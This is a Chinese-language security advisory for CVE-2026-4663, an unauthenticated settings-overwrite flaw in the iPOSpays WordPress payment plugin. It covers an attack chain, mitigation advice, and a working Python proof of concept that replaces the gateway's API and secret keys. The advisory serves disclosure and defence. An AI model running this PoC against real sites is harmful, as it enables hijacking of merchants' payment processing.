CVE-2026-4663 iPOSpays插件权限缺失漏洞

漏洞信息

漏洞编号

CVE-2026-4663

漏洞类型

权限缺失

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

iPOSpays Gateways WC Plugin for WordPress

漏洞概述

WordPress iPOSpays Gateways WC 插件在 1.3.7 及以下版本中存在权限缺失漏洞。由于特定 REST API 端点未进行权限验证，未经身份验证的攻击者可修改插件设置，覆盖 API 密钥等敏感数据。

技术细节

该漏洞的根本原因在于插件代码中注册 REST API 端点 `/wp-json/ipospays/v1/save_settings` 时，错误地将 `permission_callback` 设置为 `__return_true`。这绕过了 WordPress 的权限验证机制，导致任何未登录用户均可访问该接口。攻击者利用此漏洞，只需构造包含恶意配置数据的 POST 请求发送至该端点，即可强制更新数据库中的 `woocommerce_ipospays_settings` 选项。这使得攻击者能够覆盖合法的支付网关 API 密钥、密钥令牌等关键信息，进而接管支付流程或导致支付功能异常。

攻击链分析

STEP 1

侦察

攻击者识别目标站点使用了 WordPress iPOSpays Gateways WC 插件且版本低于 1.3.7。

STEP 2

构造载荷

攻击者构造包含恶意 API 密钥和支付令牌的 JSON 数据，准备覆盖原有配置。

STEP 3

发送请求

攻击者向未授权的 REST API 端点 /wp-json/ipospays/v1/save_settings 发送 POST 请求。

STEP 4

利用成功

由于缺乏权限检查，插件接受请求并将恶意配置写入数据库，攻击者控制支付网关。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_url):
    """
    PoC for CVE-2026-4663
    Exploits missing authorization on save_settings endpoint.
    """
    endpoint = f"{target_url}/wp-json/ipospays/v1/save_settings"
    
    # Malicious settings to overwrite legitimate keys
    payload = {
        "woocommerce_ipospays_settings": {
            "api_key": "HACKED_API_KEY",
            "secret_key": "HACKED_SECRET_KEY",
            "testmode": "no"
        }
    }
    
    try:
        # Send unauthenticated POST request
        response = requests.post(endpoint, json=payload, timeout=10)
        
        if response.status_code == 200:
            return "[+] Vulnerable! Settings likely updated."
        else:
            return f"[-] Request failed with status: {response.status_code}"
    except Exception as e:
        return f"[!] Error: {str(e)}"

# Usage
# print(exploit_poc("http://target-site.com"))

影响范围

iPOSpays Gateways WC <= 1.3.7

防御指南

临时缓解措施

如果无法立即升级，建议通过 Web 服务器配置（如 .htaccess 或 Nginx 规则）阻止对外部访问 /wp-json/ipospays/ 路径，或者暂时禁用该插件。